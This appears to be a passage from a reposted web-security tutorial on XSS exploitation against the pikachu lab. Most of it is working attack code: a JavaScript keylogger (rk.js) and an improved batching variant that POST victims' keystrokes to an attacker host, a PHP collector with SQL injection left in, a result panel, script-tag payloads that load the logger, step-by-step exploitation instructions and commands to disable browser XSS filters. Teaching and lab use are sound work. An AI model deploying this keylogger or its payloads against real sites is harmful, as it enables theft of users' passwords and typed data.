    execute($link, $query);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Keystroke log results</title>
<link rel="stylesheet" type="text/css" href="../antxss.css" />
</head>
<body>
<div id="title">
    <h1>pikachu XSS keystroke log results</h1>
    <a href="../xssmanager.php">Back to home</a>
</div>
<div id="xss_main">
<table border="1px" cellpadding="10" cellspacing="1" bgcolor="#5f9ea0">
    <tr>
        <td>id</td>
        <td>record</td>
        <td>action</td>
    </tr>
    <?php
    $query = "select * from keypress";
    $result = mysqli_query($link, $query);
    while ($data = mysqli_fetch_assoc($result)) {
        // $data['data'] is echoed into the HTML unescaped, so markup typed by
        // the victim is rendered (and any script executed) in this panel.
        $html = <<<A
        <tr>
            <td>{$data['id']}</td>
            <td>{$data['data']}</td>
            <td><a href="pkxss_keypress_result.php?id={$data['id']}">Delete</a></td>
        </tr>
A;
        echo $html;
    }
    ?>
</table>
</div>
</body>
</html>

(7) How it works from the attacker's side

         The attacker posts the payload on a message board or in a comment field. When a victim opens that page the XSS fires and the page loads the attacker's rk.js from the remote server. That script sends the user's keystrokes by POST to rkserver.php, which writes the POSTed data into its database. Finally the attacker reads the victim's keystrokes through the pkxss_keypress_result.php page on their own server.

(8) How it works from the victim's side

         As soon as the victim opens the message board or comment page the XSS fires, that is, the page loads rk.js from the attacker's remote server. The script POSTs the user's keystrokes to rkserver.php, which stores them in the database for the attacker to retrieve. Only keys typed while that page is open and has focus are captured, because the handler hangs off that page's document object; typing in another tab or in a browser dialog is not seen.
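The exchange described in (7) and (8), as an added offline simulation; this is example code written for this page, not code from the original post or from the pikachu project. The helper names (buildBodyRaw, buildBodyEncoded, parseBody, storeKeystrokes, renderRow, rkjsRequestBodies) and the sample keystrokes are this example's own assumptions. It models the victim's POST body, what PHP's `$_POST['datax']` decodes from it, the in-memory equivalent of the keypress table, and the row the result page renders, and in doing so surfaces three things the lab code does not document: rk.js concatenates raw characters after `datax=`, so `&`, `=`, `+` or `%` typed by the victim corrupt the form-encoded body; rk.js re-sends the whole buffer on every keystroke, so the table fills with every prefix of what was typed; and the result page echoes the stored text into HTML unescaped, so a victim who types `<script>` ends up executing in the attacker's own panel.

```javascript
// Added example, not code from the original post or from the pikachu project.
// Offline model of rk.js -> rkserver.php -> pkxss_keypress_result.php.
// All helper names and the sample keystrokes below are this example's own.

// Victim side as rk.js does it: "datax=" + raw keystrokes, no encoding.
function buildBodyRaw(keys) {
  return "datax=" + keys;
}

// Victim side done correctly for application/x-www-form-urlencoded.
function buildBodyEncoded(keys) {
  return "datax=" + encodeURIComponent(keys);
}

// The sequence of bodies rk.js sends for a typed string: one POST per key,
// each carrying the whole buffer so far.
function rkjsRequestBodies(keys) {
  const bodies = [];
  for (let i = 1; i <= keys.length; i++) {
    bodies.push(buildBodyRaw(keys.slice(0, i)));
  }
  return bodies;
}

// Server side: what PHP's $_POST['datax'] contains for a given body.
// URLSearchParams follows the same rules PHP applies: split on '&', split each
// pair on the first '=', turn '+' into a space, decode %XX escapes.
function parseBody(body) {
  return new URLSearchParams(body).get("datax");
}

// Constructed in-memory stand-in for the keypress table (no database).
function storeKeystrokes(table, body) {
  const data = parseBody(body);
  table.push({ id: table.length + 1, data: data });
  return data;
}

function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Attacker panel: one table row, unescaped as pkxss_keypress_result.php builds
// it (escape = false) or with the escaping the panel should apply (escape = true).
function renderRow(row, escape) {
  const cell = escape ? escapeHtml(row.data) : row.data;
  return "<tr><td>" + row.id + "</td><td>" + cell + "</td></tr>";
}

function demo() {
  const typed = "user=admin&pass=p+w%";   // constructed sample keystrokes
  const table = [];
  const raw = storeKeystrokes(table, buildBodyRaw(typed));       // password lost
  const enc = storeKeystrokes(table, buildBodyEncoded(typed));   // full string kept
  storeKeystrokes(table, buildBodyEncoded("<script>alert(1)</script>"));
  return {
    raw: raw,                                       // "user=admin"
    encoded: enc,                                   // "user=admin&pass=p+w%"
    prefixes: rkjsRequestBodies("user").length,     // 4 POSTs for 4 keys
    unsafeRow: renderRow(table[2], false),          // live <script> in the panel
    safeRow: renderRow(table[2], true),             // inert &lt;script&gt;
  };
}

console.log(demo());
```

Run with `node` and compare `raw` against `encoded`: with rk.js's raw concatenation the server keeps only the part before the first `&`, and the `=` the victim typed is swallowed by the form parser. The `unsafeRow`/`safeRow` pair is the same row rendered the way the lab panel does it versus with output encoding; the difference is why an attacker's own collection panel needs the same XSS hygiene as any other page.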

9、XSS exploitation example: keylogger

(1) Target: http://www.webtester.com/xss/xss02.php

(2) Attacker's web server:

Attacker host: www.exploit.cool (the domain resolves to 192.168.97.130)
Attacker's web directory: http://www.exploit.cool/exp/pikachu/rkeypress/xfish/
Malicious keylogger script hosted by the attacker: http://www.exploit.cool/exp/pikachu/pkxss/rkeypress/rk.js
PHP file that receives the keystroke data: http://www.exploit.cool/exp/pikachu/pkxss/rkeypress/rkserver.php
PHP file on which the attacker reads the keystroke data: http://www.exploit.cool/exp/pikachu/pkxss/rkeypress/pkxss_keypress_result.php

(3) rk.js

/**
 * Created by runner on 2018/7/8.
 */
// Returns an XMLHttpRequest, falling back to the legacy ActiveX objects on old IE.
function createAjax() {
    var request = false;
    if (window.XMLHttpRequest) {
        request = new XMLHttpRequest();
        if (request.overrideMimeType) {
            request.overrideMimeType("text/xml");
        }
    } else if (window.ActiveXObject) {
        var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0',
                        'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
        for (var i = 0; i < versions.length; i++) {
            try {
                request = new ActiveXObject(versions[i]);
                if (request) {
                    return request;
                }
            } catch (e) {
                request = false;
            }
        }
    }
    return request;
}

var ajax = null;
// The whole buffer is kept and re-sent on every keystroke, so the server
// receives "datax=u", "datax=us", "datax=use", ... for a single word.
var xl = "datax=";

// Relies on the global window.event (IE-style); keyCode during keypress is the
// character code for printable keys, so fromCharCode turns it back into text.
function onkeypress() {
    var realkey = String.fromCharCode(event.keyCode);
    xl += realkey;
    show();
}
document.onkeypress = onkeypress;

function show() {
    ajax = createAjax();
    ajax.onreadystatechange = function () {
        if (ajax.readyState == 4) {
            if (ajax.status == 200) {
                var data = ajax.responseText;
            } else {
                // A failed request pops an alert in the victim's browser,
                // which gives the implant away.
                alert("page request failed");
            }
        }
    }
    var postdate = xl;
    ajax.open("POST", "http://www.exploit.cool/exp/pikachu/pkxss/rkeypress/rk.js".replace("rk.js", "rkserver.php"), true);
    ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    // Content-length and Connection are forbidden request headers; browsers
    // ignore these two calls and set the values themselves.
    ajax.setRequestHeader("Content-length", postdate.length);
    ajax.setRequestHeader("Connection", "close");
    ajax.send(postdate);
}

(4) rkserver.php (the same file shown in section 8)

<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link = connect();
// Allow the page to be called cross-origin (only needed for rk.js to read
// the response; the form-urlencoded POST itself arrives regardless).
header("Access-Control-Allow-Origin:*");
$data = $_POST['datax'];
// Raw POST data interpolated into SQL, exactly as in the lab: open to injection.
$query = "insert keypress(data) values('$data')";
$result = mysqli_query($link, $query);
?>

(5) The attacker's payload

payload-1 (works): <script src="http://www.exploit.cool/exp/pikachu/pkxss/rkeypress/rk.js"></script>
payload-2 (works): <script src="//www.exploit.cool/exp/pikachu/pkxss/rkeypress/rk.js"></script>
payload-3 (does not work): <img src="http://www.exploit.cool/exp/pikachu/pkxss/rkeypress/rk.js" />

Payload-3 fails because the browser fetches an img src as image data and never evaluates it as JavaScript: the request does reach the attacker's server, but rk.js is never executed and no keystroke is logged. Payload-2 uses a protocol-relative URL, which inherits the scheme of the vulnerable page; if that page is served over HTTPS, the attacker's host must serve rk.js over HTTPS too, otherwise the browser blocks it as mixed content.

(6) Exploitation process:

Step 1: Acting as the attacker, post the payload to the message board; the XSS fires whenever a victim visits that page.

Step 2: Acting as the victim, visit the message board so that the XSS fires; every key the victim presses on that page is recorded in the attacker's remote database.

Step 3: Acting as the attacker, read the recorded keystrokes from the pkxss_keypress_result.php page on the attacker's own web server,

or look at the keystroke data directly in the database.
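The browser-side half of the attack is what the payloads above load as rk.js. The following is an added example written for this page, not pikachu's own rk.js: it shows what such a script has to do to feed the PHP collector above (hook the keypress event, batch the characters, and POST them as a form field named `datax`). The collector URL is an assumption, and the network call is injected so the logic runs under Node without a DOM. One point worth noticing: because the body is application/x-www-form-urlencoded, the cross-origin POST is a CORS "simple request", so the browser sends it without a preflight and the keystrokes are stored whether or not the server's Access-Control-Allow-Origin header is present; that header only decides whether the injected script may read the response, which the keylogger never needs to.

```javascript
// Added example: browser-side keylogger logic matching the PHP collector above.
// Not pikachu's rk.js. The endpoint below is assumed for illustration.
const ASSUMED_SERVER = 'http://www.exploit.cool/exp/pikachu/pkxss/rkeypress/rkserver.php';

// Build the request the collector expects: POST, urlencoded body, one field "datax".
// urlencoded content keeps the cross-origin POST a CORS simple request (no preflight).
function buildRequest(url, keys) {
  const body = new URLSearchParams({ datax: keys }).toString();
  return {
    url,
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body,
  };
}

// Keystroke capture with batching. `send(request)` is injected: fetch() in a
// browser, a recorder in the test. Returns an object to wire into event handlers.
function makeKeylogger(url, send, batchSize = 8) {
  let buffer = '';

  function flush() {
    if (buffer.length === 0) return null;     // nothing captured since last flush
    const req = buildRequest(url, buffer);
    buffer = '';
    send(req);
    return req;
  }

  function onKeyPress(evt) {
    // evt.key is a single printable character or a name such as "Enter"/"Shift";
    // keep printable characters and record Enter as a newline so that form
    // submissions (e.g. a password followed by Enter) are visible in the log.
    if (evt.key === 'Enter') buffer += '\n';
    else if (typeof evt.key === 'string' && evt.key.length === 1) buffer += evt.key;
    if (buffer.length >= batchSize) flush();   // ship in batches to limit requests
  }

  return { onKeyPress, flush, pending: () => buffer };
}

// How the loaded script would attach itself in a real browser; guarded so that
// this file also runs under Node. mode:'no-cors' is enough because the
// response is never read.
if (typeof document !== 'undefined' && typeof fetch === 'function') {
  const logger = makeKeylogger(ASSUMED_SERVER, (r) =>
    fetch(r.url, { method: r.method, headers: r.headers, body: r.body, mode: 'no-cors' }));
  document.addEventListener('keypress', (e) => logger.onKeyPress(e));
  window.addEventListener('beforeunload', () => logger.flush());
}

if (typeof module !== 'undefined') {
  module.exports = { buildRequest, makeKeylogger, ASSUMED_SERVER };
}
```

Under Node the code only builds requests; feeding synthetic events such as `{ key: 'a' }` to `onKeyPress` and inspecting what `flush()` returns shows exactly the body (`datax=...`) that lands in the `keypress` table.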

10. Turning off the browser's XSS protection

(1) How to turn it off in IE:

Internet Options → Security → select the zone → Custom level... → Scripting → "Enable XSS filter" → Disable.

(2) How to turn it off in Chrome:

Step 1: Find Chrome's installation directory, as shown below

C:\Program Files (x86)\Google\Chrome\Application\Chrome.exe

Step 2: Open cmd and enter the following command to start the browser with the XSS protection disabled, as shown below

"C:\Program Files (x86)\Google\Chrome\Application\Chrome.exe" --disable-xss-auditor

Two caveats: the `--args` token sometimes seen in this command is not a Chrome switch (it is only needed when launching through macOS `open -a "Google Chrome" --args ...`) and can be dropped when invoking Chrome.exe directly; and Google removed the XSS Auditor in Chrome 78 (late 2019), so on any current Chrome this switch is a no-op because there is no longer a built-in reflected-XSS filter to turn off.

(3) How to turn it off in Firefox:

Firefox has never shipped a reflected-XSS filter, so there is nothing to disable; the only thing in the way of a reflected or DOM-based payload is the URL encoding noted in section 2.

11. Reflections

(1) What is the pop-up test really testing?

The alert pop-up test checks whether a script tag is usable and under our control on that page.

(2) What does the script tag do for us?

First, it can embed malicious JS directly inline; second, through its src attribute it can pull in an external malicious JS file.

This article comes from the web and does not represent the position of 程式碼花園; if it infringes your rights, please contact the administrator. https://www.codegarden.cn/article/5480/